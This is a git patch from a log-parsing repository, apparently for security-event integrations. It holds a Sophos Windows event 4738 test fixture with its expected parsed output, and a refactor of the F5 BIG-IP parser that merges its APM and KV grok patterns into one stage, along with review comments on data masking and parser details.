\"user_workstations\": \"%%XXXX\",\n \"meta_licence\": \"MTR\",\n \"ioc_detection_experiment_level\": 0,\n \"privilege_list\": \"-\",\n \"ioc_created_at\": \"2024-10-22T14:41:22.595Z\",\n \"ingestion_timestamp\": \"2024-10-22T14:41:09.572Z\",\n \"home_directory\": \"%%XXXX\",\n \"ioc_detection_attack\": \"Suspicious Activity\",\n \"numerics\": false,\n \"eventid\": 4738,\n \"meta_public_ip\": \"1.2.3.4\",\n \"counter\": 0,\n \"detection_id_dedup\": \"detectionIdDedup-xxxxxxxxxxxxxxx\",\n \"password_last_set\": \"%%1794\",\n \"meta_hostname\": \"XXXX-XXXXXXXX\",\n \"ioc_detection_references\": \"[\\\"https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738\\\"]\",\n \"ioc_worker_name\": \"Security Event Service\",\n \"ioc_detection_type\": \"Threat\",\n \"ioc_detection_category\": \"Threat\",\n \"ioc_unix_time\": \"2024-10-22T14:40:48.000Z\",\n \"epoch\": 1729607690,\n \"meta_ip_mask\": \"255.255.252.0\",\n \"ioc_worker_id\": \"security-event-service\",\n \"handler_verdict_suppression_xdr\": false,\n \"unix_time\": \"2024-10-22T14:40:48.000Z\",\n \"ioc_log_type\": \"summary\",\n \"query_source\": \"xdr_only\",\n \"host_identifier\": \"hostIdentifier-xxxxxxxxxxxxxxx\",\n \"partition_bucket\": \"87\",\n \"home_path\": \"%%XXXX\",\n \"meta_public_ip_country\": \"France\",\n \"meta_boot_time\": 1729607865,\n \"subject_username\": \"XXXX-XXXXXXXX$\",\n \"handler_verdicts_detection_descriptions\": {\n \"default\": \"{\\\"created_reason_id\\\":\\\"WIN-EVENT-4738\\\",\\\"significance_id\\\":\\\"WIN-EVENT-4738\\\"}\"\n },\n \"meta_os_name\": \"Microsoft Windows 11 Professionnel\",\n \"osquery_action\": \"added\",\n \"script_path\": \"%%XXXX\",\n \"account_expires\": \"%%1794\",\n \"meta_query_pack_version\": \"1.21.26\",\n \"subject_domain\": \"ACOSS\",\n \"handler_verdict_suppression\": false,\n \"calendar_time\": \"2024-10-22T14:40:48.000Z\",\n \"meta_eid\": \"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\",\n \"meta_public_ip_longitude\": 2.3387,\n 
\"ioc_detection_id\": \"WIN-EVENT-4738\",\n \"meta_os_platform\": \"windows\",\n \"meta_username\": \"\",\n \"detection_identifier\": \"xxxxxxxxx01xxxxxxxxxxxxxxxxxxxxx_detectionIdDedup-xxxxxxxxxxxxxxx\",\n \"handler_verdict_escalation\": false,\n \"query_name\": \"windows_event_user_account_changed\",\n \"provider_name\": \"Microsoft-Windows-Security-Auditing\",\n \"meta_os_type\": \"\",\n \"meta_os_version\": \"10.0.22631\",\n \"sam_account_name\": \"TestUser\",\n \"meta_public_ip_latitude\": 48.8582,\n \"source\": \"Security\",\n \"ioc_detection_licenses\": \"[\\\"MTR\\\",\\\"XDR\\\"]\",\n \"user_principal_name\": \"-\",\n \"description\": \"A User Account was changed\",\n \"meta_aggressive_activity\": \"False\",\n \"meta_ip_address\": \"1.2.3.1\",\n \"handler_verdicts\": \"{\\\"default\\\":{\\\"correlation\\\":{\\\"correlate\\\":false,\\\"correlationIds\\\":null,\\\"id\\\":\\\"hostIdentifier-xxxxxxxxxxxxxxx111-xxxx-xxxxx-xxxxxx111111\\\"},\\\"escalation\\\":false,\\\"labels\\\":[],\\\"matched_rules\\\":[{\\\"description\\\":\\\"Define the mutation data structure for subsequent mutation rules to reference\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"define_mutation_structure\\\"},{\\\"description\\\":\\\"rule to normalize osquery detections\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"normalize_osquery_detections\\\"},{\\\"description\\\":\\\"Update the description in handler verdicts to add detection id\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"add_detection_id\\\"},{\\\"description\\\":\\\"Correlate Osquery detections on customer ID and host 
ID\\\",\\\"kb\\\":\\\"correlation\\\",\\\"name\\\":\\\"osquery_correlation_id\\\"}],\\\"mutations\\\":{\\\"descriptions\\\":{\\\"case_descriptions\\\":{\\\"correlated_reason_id\\\":\\\"\\\",\\\"created_reason_id\\\":\\\"\\\"},\\\"detection_descriptions\\\":{\\\"created_reason_id\\\":\\\"WIN-EVENT-4738\\\",\\\"significance_id\\\":\\\"WIN-EVENT-4738\\\"}},\\\"entities\\\":[{\\\"attributes\\\":{\\\"domain_controller\\\":\\\"False\\\",\\\"endpoint_type\\\":\\\"computer\\\",\\\"hostname\\\":\\\"XXXX-XXXXXXXX\\\",\\\"id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"os_platform\\\":\\\"windows\\\",\\\"os_type\\\":\\\"\\\"},\\\"id\\\":\\\"b5c47470231d356f5cf8d90a31999db59172206adef7958ec9c650b9ce99147b\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"device\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.4\\\",\\\"external\\\":true,\\\"id\\\":\\\"263522d8b9d989b8c304a6d2f088f107b6ee0010675a11fb459b326eb27edefd\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"46ce85dc0d61d3ddc073e7a66074a8add18e75b082eef550e08863895dcbadb0\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.1\\\",\\\"external\\\":false,\\\"id\\\":\\\"ead232f295b08325f6b65bd85a8454239cd479ef30e470f594f2fcb628ec3d64\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"a2bf7ac1f3a3e09342ef4510b4d63f53100334262aa0fe8eef47a0e3642a34fe\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"}],\\\"labels\\\":[]},\\\"rule_hits\\\":[],\\\"rule_hits_summary\\\":{\\\"correlation\\\":[\\\"osquery_correlation_id\\\"],\\\"escalation\\\":[],\\\"mutation\\\":[\\\"define_mutation_structure\\\",\\\"normalize_osquery_detections\\\",\\\"add_detection_id\\\"],\\\"suppression\\\":[]},\\\"suppression\\\":false},\\\"mdr\\\":{\\\"correlation\\\":{\\\"correlate\\\
":false,\\\"correlationIds\\\":null,\\\"id\\\":\\\"\\\"},\\\"escalation\\\":false,\\\"labels\\\":[],\\\"matched_rules\\\":[{\\\"description\\\":\\\"Define the mutation data structure for subsequent mutation rules to reference\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"define_mutation_structure\\\"}],\\\"mutations\\\":{\\\"descriptions\\\":{\\\"case_descriptions\\\":{\\\"correlated_reason_id\\\":\\\"\\\",\\\"created_reason_id\\\":\\\"\\\"},\\\"detection_descriptions\\\":{\\\"created_reason_id\\\":\\\"\\\",\\\"significance_id\\\":\\\"\\\"}},\\\"entities\\\":[],\\\"labels\\\":[]},\\\"rule_hits\\\":[],\\\"rule_hits_summary\\\":{\\\"correlation\\\":[],\\\"escalation\\\":[],\\\"mutation\\\":[\\\"define_mutation_structure\\\"],\\\"suppression\\\":[]},\\\"suppression\\\":false},\\\"xdr\\\":{\\\"correlation\\\":{\\\"correlate\\\":false,\\\"id\\\":\\\"\\\",\\\"correlationIds\\\":null},\\\"mutations\\\":{},\\\"matched_rules\\\":[],\\\"labels\\\":[],\\\"rule_hits\\\":[],\\\"rule_hits_summary\\\":{\\\"correlation\\\":[],\\\"escalation\\\":[],\\\"mutation\\\":[],\\\"suppression\\\":[]},\\\"escalation\\\":false,\\\"suppression\\\":false}}\",\n \"ingest_date\": \"2024-10-22\",\n \"target_domain\": \"XXXX-XXXXXXXX\",\n \"uac\": \"-\",\n \"meta_endpoint_type\": \"computer\",\n \"meta_domain_controller\": \"False\",\n \"customer_id\": \"111-xxxx-xxxxx-xxxxxx111111\",\n \"ioc_detection_description\": \"Windows Event User Account Changed.\",\n \"message_identifier\": \"fbf30057d0b09be51ec23ca2d8354d1fe1c4329a6d52e6ed3bddca127cad105d\",\n \"ioc_attack_type\": \"Security Event Service Detections\",\n \"target_username\": \"TestUser\",\n \"display_name\": \"%%XXXX\",\n \"allowed_to_delegate_to\": \"-\",\n \"ioc_detection_weight\": 4\n}" + }, + "expected": { + "message": "{\n \"upload_size\": 1406,\n \"profile_path\": \"%%XXXX\",\n \"record_identifier\": \"xxxxxxxxx01xxxxxxxxxxxxxxxxxxxxx\",\n \"ioc_severity\": 4,\n \"handler_verdicts_case_descriptions\": {\n \"default\": 
\"{\\\"correlated_reason_id\\\":\\\"\\\",\\\"created_reason_id\\\":\\\"\\\"}\"\n },\n \"user_parameters\": \"%%XXXX\",\n \"folded\": 0,\n \"meta_mac_address\": \"c5:1a:64:c1:65:3a\",\n \"endpoint_id\": \"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\",\n \"handler_verdict_suppression_mdr\": false,\n \"meta_public_ip_country_code\": \"FR\",\n \"schema_version\": \"24\",\n \"subject_logon_id\": \"0x3e7\",\n \"ioc_detection_mitre_attack\": \"[]\",\n \"handler_verdicts_entities\": \"[{\\\"attributes\\\":{\\\"domain_controller\\\":\\\"False\\\",\\\"endpoint_type\\\":\\\"computer\\\",\\\"hostname\\\":\\\"XXXX-XXXXXXXX\\\",\\\"id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"os_platform\\\":\\\"windows\\\",\\\"os_type\\\":\\\"\\\"},\\\"id\\\":\\\"b5c47470231d356f5cf8d90a31999db59172206adef7958ec9c650b9ce99147b\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"device\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.4\\\",\\\"external\\\":true,\\\"id\\\":\\\"263522d8b9d989b8c304a6d2f088f107b6ee0010675a11fb459b326eb27edefd\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"46ce85dc0d61d3ddc073e7a66074a8add18e75b082eef550e08863895dcbadb0\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.1\\\",\\\"external\\\":false,\\\"id\\\":\\\"ead232f295b08325f6b65bd85a8454239cd479ef30e470f594f2fcb628ec3d64\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"a2bf7ac1f3a3e09342ef4510b4d63f53100334262aa0fe8eef47a0e3642a34fe\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"}]\",\n \"user_workstations\": \"%%XXXX\",\n \"meta_licence\": \"MTR\",\n \"ioc_detection_experiment_level\": 0,\n \"privilege_list\": \"-\",\n \"ioc_created_at\": \"2024-10-22T14:41:22.595Z\",\n \"ingestion_timestamp\": \"2024-10-22T14:41:09.572Z\",\n 
\"home_directory\": \"%%XXXX\",\n \"ioc_detection_attack\": \"Suspicious Activity\",\n \"numerics\": false,\n \"eventid\": 4738,\n \"meta_public_ip\": \"1.2.3.4\",\n \"counter\": 0,\n \"detection_id_dedup\": \"detectionIdDedup-xxxxxxxxxxxxxxx\",\n \"password_last_set\": \"%%1794\",\n \"meta_hostname\": \"XXXX-XXXXXXXX\",\n \"ioc_detection_references\": \"[\\\"https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738\\\"]\",\n \"ioc_worker_name\": \"Security Event Service\",\n \"ioc_detection_type\": \"Threat\",\n \"ioc_detection_category\": \"Threat\",\n \"ioc_unix_time\": \"2024-10-22T14:40:48.000Z\",\n \"epoch\": 1729607690,\n \"meta_ip_mask\": \"255.255.252.0\",\n \"ioc_worker_id\": \"security-event-service\",\n \"handler_verdict_suppression_xdr\": false,\n \"unix_time\": \"2024-10-22T14:40:48.000Z\",\n \"ioc_log_type\": \"summary\",\n \"query_source\": \"xdr_only\",\n \"host_identifier\": \"hostIdentifier-xxxxxxxxxxxxxxx\",\n \"partition_bucket\": \"87\",\n \"home_path\": \"%%XXXX\",\n \"meta_public_ip_country\": \"France\",\n \"meta_boot_time\": 1729607865,\n \"subject_username\": \"XXXX-XXXXXXXX$\",\n \"handler_verdicts_detection_descriptions\": {\n \"default\": \"{\\\"created_reason_id\\\":\\\"WIN-EVENT-4738\\\",\\\"significance_id\\\":\\\"WIN-EVENT-4738\\\"}\"\n },\n \"meta_os_name\": \"Microsoft Windows 11 Professionnel\",\n \"osquery_action\": \"added\",\n \"script_path\": \"%%XXXX\",\n \"account_expires\": \"%%1794\",\n \"meta_query_pack_version\": \"1.21.26\",\n \"subject_domain\": \"ACOSS\",\n \"handler_verdict_suppression\": false,\n \"calendar_time\": \"2024-10-22T14:40:48.000Z\",\n \"meta_eid\": \"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\",\n \"meta_public_ip_longitude\": 2.3387,\n \"ioc_detection_id\": \"WIN-EVENT-4738\",\n \"meta_os_platform\": \"windows\",\n \"meta_username\": \"\",\n \"detection_identifier\": \"xxxxxxxxx01xxxxxxxxxxxxxxxxxxxxx_detectionIdDedup-xxxxxxxxxxxxxxx\",\n \"handler_verdict_escalation\": false,\n 
\"query_name\": \"windows_event_user_account_changed\",\n \"provider_name\": \"Microsoft-Windows-Security-Auditing\",\n \"meta_os_type\": \"\",\n \"meta_os_version\": \"10.0.22631\",\n \"sam_account_name\": \"TestUser\",\n \"meta_public_ip_latitude\": 48.8582,\n \"source\": \"Security\",\n \"ioc_detection_licenses\": \"[\\\"MTR\\\",\\\"XDR\\\"]\",\n \"user_principal_name\": \"-\",\n \"description\": \"A User Account was changed\",\n \"meta_aggressive_activity\": \"False\",\n \"meta_ip_address\": \"1.2.3.1\",\n \"handler_verdicts\": \"{\\\"default\\\":{\\\"correlation\\\":{\\\"correlate\\\":false,\\\"correlationIds\\\":null,\\\"id\\\":\\\"hostIdentifier-xxxxxxxxxxxxxxx111-xxxx-xxxxx-xxxxxx111111\\\"},\\\"escalation\\\":false,\\\"labels\\\":[],\\\"matched_rules\\\":[{\\\"description\\\":\\\"Define the mutation data structure for subsequent mutation rules to reference\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"define_mutation_structure\\\"},{\\\"description\\\":\\\"rule to normalize osquery detections\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"normalize_osquery_detections\\\"},{\\\"description\\\":\\\"Update the description in handler verdicts to add detection id\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"add_detection_id\\\"},{\\\"description\\\":\\\"Correlate Osquery detections on customer ID and host 
ID\\\",\\\"kb\\\":\\\"correlation\\\",\\\"name\\\":\\\"osquery_correlation_id\\\"}],\\\"mutations\\\":{\\\"descriptions\\\":{\\\"case_descriptions\\\":{\\\"correlated_reason_id\\\":\\\"\\\",\\\"created_reason_id\\\":\\\"\\\"},\\\"detection_descriptions\\\":{\\\"created_reason_id\\\":\\\"WIN-EVENT-4738\\\",\\\"significance_id\\\":\\\"WIN-EVENT-4738\\\"}},\\\"entities\\\":[{\\\"attributes\\\":{\\\"domain_controller\\\":\\\"False\\\",\\\"endpoint_type\\\":\\\"computer\\\",\\\"hostname\\\":\\\"XXXX-XXXXXXXX\\\",\\\"id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"os_platform\\\":\\\"windows\\\",\\\"os_type\\\":\\\"\\\"},\\\"id\\\":\\\"b5c47470231d356f5cf8d90a31999db59172206adef7958ec9c650b9ce99147b\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"device\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.4\\\",\\\"external\\\":true,\\\"id\\\":\\\"263522d8b9d989b8c304a6d2f088f107b6ee0010675a11fb459b326eb27edefd\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"46ce85dc0d61d3ddc073e7a66074a8add18e75b082eef550e08863895dcbadb0\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.1\\\",\\\"external\\\":false,\\\"id\\\":\\\"ead232f295b08325f6b65bd85a8454239cd479ef30e470f594f2fcb628ec3d64\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"a2bf7ac1f3a3e09342ef4510b4d63f53100334262aa0fe8eef47a0e3642a34fe\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"}],\\\"labels\\\":[]},\\\"rule_hits\\\":[],\\\"rule_hits_summary\\\":{\\\"correlation\\\":[\\\"osquery_correlation_id\\\"],\\\"escalation\\\":[],\\\"mutation\\\":[\\\"define_mutation_structure\\\",\\\"normalize_osquery_detections\\\",\\\"add_detection_id\\\"],\\\"suppression\\\":[]},\\\"suppression\\\":false},\\\"mdr\\\":{\\\"correlation\\\":{\\\"correlate\\\
":false,\\\"correlationIds\\\":null,\\\"id\\\":\\\"\\\"},\\\"escalation\\\":false,\\\"labels\\\":[],\\\"matched_rules\\\":[{\\\"description\\\":\\\"Define the mutation data structure for subsequent mutation rules to reference\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"define_mutation_structure\\\"}],\\\"mutations\\\":{\\\"descriptions\\\":{\\\"case_descriptions\\\":{\\\"correlated_reason_id\\\":\\\"\\\",\\\"created_reason_id\\\":\\\"\\\"},\\\"detection_descriptions\\\":{\\\"created_reason_id\\\":\\\"\\\",\\\"significance_id\\\":\\\"\\\"}},\\\"entities\\\":[],\\\"labels\\\":[]},\\\"rule_hits\\\":[],\\\"rule_hits_summary\\\":{\\\"correlation\\\":[],\\\"escalation\\\":[],\\\"mutation\\\":[\\\"define_mutation_structure\\\"],\\\"suppression\\\":[]},\\\"suppression\\\":false},\\\"xdr\\\":{\\\"correlation\\\":{\\\"correlate\\\":false,\\\"id\\\":\\\"\\\",\\\"correlationIds\\\":null},\\\"mutations\\\":{},\\\"matched_rules\\\":[],\\\"labels\\\":[],\\\"rule_hits\\\":[],\\\"rule_hits_summary\\\":{\\\"correlation\\\":[],\\\"escalation\\\":[],\\\"mutation\\\":[],\\\"suppression\\\":[]},\\\"escalation\\\":false,\\\"suppression\\\":false}}\",\n \"ingest_date\": \"2024-10-22\",\n \"target_domain\": \"XXXX-XXXXXXXX\",\n \"uac\": \"-\",\n \"meta_endpoint_type\": \"computer\",\n \"meta_domain_controller\": \"False\",\n \"customer_id\": \"111-xxxx-xxxxx-xxxxxx111111\",\n \"ioc_detection_description\": \"Windows Event User Account Changed.\",\n \"message_identifier\": \"fbf30057d0b09be51ec23ca2d8354d1fe1c4329a6d52e6ed3bddca127cad105d\",\n \"ioc_attack_type\": \"Security Event Service Detections\",\n \"target_username\": \"TestUser\",\n \"display_name\": \"%%XXXX\",\n \"allowed_to_delegate_to\": \"-\",\n \"ioc_detection_weight\": 4\n}", + "event": { + "code": "WIN-EVENT-4738", + "ingested": "2024-10-22T14:41:09.572000Z", + "reason": "A User Account was changed", + "severity": 4 + }, + "@timestamp": "2024-10-22T14:40:48Z", + "destination": { + "address": "XXXX-XXXXXXXX", + "domain": 
"XXXX-XXXXXXXX" + }, + "host": { + "domain": "ACOSS", + "id": "hostIdentifier-xxxxxxxxxxxxxxx", + "name": "XXXX-XXXXXXXX", + "os": { + "full": "Microsoft Windows 11 Professionnel", + "name": "windows", + "version": "10.0.22631" + } + }, + "process": { + "name": "Security Event Service" + }, + "related": { + "hosts": [ + "XXXX-XXXXXXXX" + ], + "ip": [ + "1.2.3.1", + "1.2.3.4" + ] + }, + "sophos": { + "threat_center": { + "aggressive_activity": "False", + "detection_id_dedup": "detectionIdDedup-xxxxxxxxxxxxxxx", + "endpoint": { + "type": "computer" + }, + "event": { + "id": 4738 + }, + "id": "xxxxxxxx-xxxxxx-xxxxxx-xxxxxx", + "ioc": { + "attack_type": "Security Event Service Detections", + "detection": { + "attack": "Suspicious Activity", + "category": "Threat", + "licences": [ + "MTR", + "XDR" + ], + "type": "Threat", + "weight": "4" + }, + "log_type": "summary", + "unix_time": "2024-10-22T14:40:48.000000Z" + }, + "message": { + "id": "fbf30057d0b09be51ec23ca2d8354d1fe1c4329a6d52e6ed3bddca127cad105d" + }, + "query": { + "action": "added", + "name": "windows_event_user_account_changed", + "pack_version": "1.21.26", + "source": "xdr_only" + }, + "record_identifier": "xxxxxxxxx01xxxxxxxxxxxxxxxxxxxxx", + "worker": { + "id": "security-event-service" + } + } + }, + "source": { + "address": "1.2.3.1", + "bytes": 1406, + "geo": { + "country_iso_code": "FR", + "country_name": "France" + }, + "ip": "1.2.3.1", + "mac": "c5:1a:64:c1:65:3a", + "nat": { + "ip": "1.2.3.4" + } + }, + "user": { + "target": { + "name": "TestUser" + } + }, + "vulnerability": { + "description": "Windows Event User Account Changed.", + "reference": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738" + } + } +} \ No newline at end of file From e1447b4fecbbf3dfa65bbea609cb0d9afe35accd Mon Sep 17 00:00:00 2001 
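Review bot: Most identifiers in this fixture are masked with `x`/`XXXX`, but `"subject_domain": "ACOSS"` (surfacing as `host.domain` in the expected output) and the half-masked `customer_id` value appear not to have been anonymised like the rest; test data committed to a public repository should use obviously synthetic values throughout. Separately, the expected output renders `ioc_detection_weight` as the string `"4"` while `event.severity` keeps the integer `4` from the same input; if the `weight` field is declared as keyword this is intended, otherwise the types should agree. The file also ends without a trailing newline.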
From: lvoloshyn-sekoia Date: Wed, 30 Oct 2024 13:56:40 +0200 Subject: [PATCH 183/317] Fix F5 Big-Ip --- F5 Networks/f5-big-ip/ingest/parser.yml | 71 ++++++++----------- .../f5-big-ip/tests/test_apm_access_1.json | 3 +- .../f5-big-ip/tests/test_apm_access_2.json | 3 +- .../f5-big-ip/tests/test_apm_access_3.json | 3 +- .../f5-big-ip/tests/test_apm_access_4.json | 3 +- .../f5-big-ip/tests/test_apm_auth_1.json | 3 + .../f5-big-ip/tests/test_apm_auth_2.json | 3 + .../f5-big-ip/tests/test_apm_auth_3.json | 3 + 8 files changed, 47 insertions(+), 45 deletions(-) diff --git a/F5 Networks/f5-big-ip/ingest/parser.yml b/F5 Networks/f5-big-ip/ingest/parser.yml index 0147bdd4b..940e3bc4c 100644 --- a/F5 Networks/f5-big-ip/ingest/parser.yml +++ b/F5 Networks/f5-big-ip/ingest/parser.yml @@ -8,7 +8,7 @@ pipeline: name: grok.match properties: output_field: message - pattern: '\s?(%{CRON_LOG}|%{LOGGER_LOG}|%{SSH_LOG}|%{RULE_LOG}|%{RULE_LOG_REASON_ONLY}|%{AUDIT_LOG}|%{ARROW}|%{VPN_LOG})' + pattern: '\s?(%{CRON_LOG}|%{LOGGER_LOG}|%{SSH_LOG}|%{RULE_LOG}|%{RULE_LOG_REASON_ONLY}|%{AUDIT_LOG}|%{ARROW}|%{VPN_LOG}|%{APM_EVENT}|%{KV_HEADERS})' custom_patterns: TLS: "TLSv" HEADER: '%{WORD:action_type}\[\d*\]' 
@@ -49,6 +49,22 @@ pipeline: # vpn messages VPN_PROTOCOL: "tcp|udp" VPN_LOG: '%{DATA}\:\s*%{WORD}\:\s*%{WORD}\:\s*%{WORD:action_name} ACL\:\s*(%{DATA:rule_name}\:%{NUMBER})\s*packet\:\s*%{VPN_PROTOCOL:network_transport}\s*%{IPORHOST:source_ip}:%{POSINT:source_port} -> %{IPORHOST:destination_ip}:%{POSINT:destination_port}' + + # apm events + APM_EVENT: '%{APM_HEADER}?%{DATA:rule_name}\:\s*%{WORD}\:\s*%{WORD}\:\s*%{APM_PAYLOAD}' + APM_HEADER: "%{APM_HEADER_1}|%{APM_HEADER_2}" + APM_HEADER_1: '%{DATA:date} %{TIME:time} %{IPORHOST:source_domain} %{DATA:action_type} %{DATA}\[\d*\]:\s*(\d*:\d*: )' + APM_HEADER_2: '%{WORD:action_type}\[\d*\]:\s*(\d*:\d*: )' + APM_PAYLOAD: "%{APM_PAYLOAD_USER}|%{APM_PAYLOAD_USER_AUTH_WITH_DOMAIN}|%{APM_PAYLOAD_USER_AUTH}|%{APM_PAYLOAD_NEW_SESSION}|%{APM_PAYLOAD_ACCESS}" + APM_PAYLOAD_USER: "Username '%{DATA:user_name}'" + APM_PAYLOAD_USER_AUTH: ".*authenticate with '%{DATA:user_name}'.*" + APM_PAYLOAD_USER_AUTH_WITH_DOMAIN: ".*authenticate with '%{DATA:user_name}@%{DATA:user_domain}'.*" + APM_PAYLOAD_NEW_SESSION: 'New session from \s*client IP %{IP:src_ip} \(%{DATA}\) at VIP %{IP:dest_ip}.*' + APM_PAYLOAD_ACCESS: "Following rule '%{DATA:rule_name}' from item '%{DATA:rule_item}' to %{DATA} '%{DATA}'" + + # kv headers + KV_HEADERS: 'Rule %{DATA:rule_name} %{DATA}\:\s*%{GREEDYDATA:kvs}' + filter: '{{"CEF:0|" not in original.message}}' - name: parse_cef_event 
@@ -69,25 +85,16 @@ pipeline: item_sep: '\r\n' filter: "{{parse_cef_event.message != null and parse_cef_event.message.full_request != null}}" - - name: parse_kv_header - external: - name: grok.match - properties: - input_field: "{{original.message}}" - output_field: message - pattern: '\s*Rule %{DATA:rule_name} %{DATA}\:\s*%{GREEDYDATA:kvs}' - filter: '{{"CEF:0|" not in original.message}}' - - name: parse_kv_event external: name: kv.parse-kv properties: raise_errors: false - input_field: "{{ parse_kv_header.message.kvs }}" + input_field: "{{ parse_grok_event.message.kvs }}" output_field: message value_sep: "=" item_sep: " " - filter: "{{parse_kv_header.message != None and parse_kv_header.message.kvs != None}}" + filter: "{{parse_grok_event.message != None and parse_grok_event.message.kvs != None}}" - name: parse_audit_message external: 
@@ -108,26 +115,8 @@ pipeline: output_field: datetime filter: "{{ parse_cef_event.message != None }}" - - name: parse_apm_event - external: - name: grok.match - properties: - raise_errors: false - output_field: message - pattern: '%{HEADER}?%{DATA:rule_name}\:\s*%{WORD}\:\s*%{WORD}\:\s*%{PAYLOAD}' - custom_patterns: - HEADER: "%{HEADER_1}|%{HEADER_2}" - HEADER_1: '%{DATA:date} %{TIME:time} %{IPORHOST:source_domain} %{DATA:action_type} %{DATA}\[\d*\]:\s*(\d*:\d*: )' - HEADER_2: '\s*%{WORD:action_type}\[\d*\]:\s*(\d*:\d*: )' - PAYLOAD: "%{PAYLOAD_USER}|%{PAYLOAD_USER_AUTH_WITH_DOMAIN}|%{PAYLOAD_USER_AUTH}|%{PAYLOAD_NEW_SESSION}|%{PAYLOAD_ACCESS}" - PAYLOAD_USER: "Username '%{DATA:user_name}'" - PAYLOAD_USER_AUTH: ".*authenticate with '%{DATA:user_name}'.*" - PAYLOAD_USER_AUTH_WITH_DOMAIN: ".*authenticate with '%{DATA:user_name}@%{DATA:user_domain}'.*" - PAYLOAD_NEW_SESSION: 'New session from \s*client IP %{IP:src_ip} \(%{DATA}\) at VIP %{IP:dest_ip}.*' - PAYLOAD_ACCESS: "Following rule '%{DATA:rule_name}' from item '%{DATA:rule_item}' to %{DATA} '%{DATA}'" - - name: set_apm_event - filter: "{{ parse_apm_event.message != None }}" + filter: "{{ parse_grok_event.message.get('APM_EVENT') != None }}" - name: set_cef_fields filter: "{{ parse_cef_event.message != None }}" @@ -304,7 +293,7 @@ stages: set_kv_fields: actions: - set: - rule.name: "{{parse_kv_header.message.rule_name}}" + rule.name: "{{parse_grok_event.message.rule_name}}" source.ip: "{{parse_kv_event.message.client_ip}}" source.port: "{{parse_kv_event.message.client_port}}" 
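Review bot: The removed `parse_apm_event` stage carried `raise_errors: false`, but none of the visible properties of the merged `parse_grok_event` stage (output_field, pattern, custom_patterns in the first hunk) shows that setting, so an APM or KV message that fails the combined alternation may now fail the whole event instead of falling through; add `raise_errors: false` to `parse_grok_event` if it is not already set above the hunk. `APM_EVENT` and `KV_HEADERS` are appended last in the alternation, so an earlier `%{DATA}`-heavy alternative that happens to match an APM line wins first, and the `action.type: notice` the apm_access fixtures now gain looks like the syslog level captured by `%{DATA:action_type}` in `APM_HEADER_1` rather than an action — worth confirming that mapping is intended. The `parse_grok_event` stage definition starts outside the hunk.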
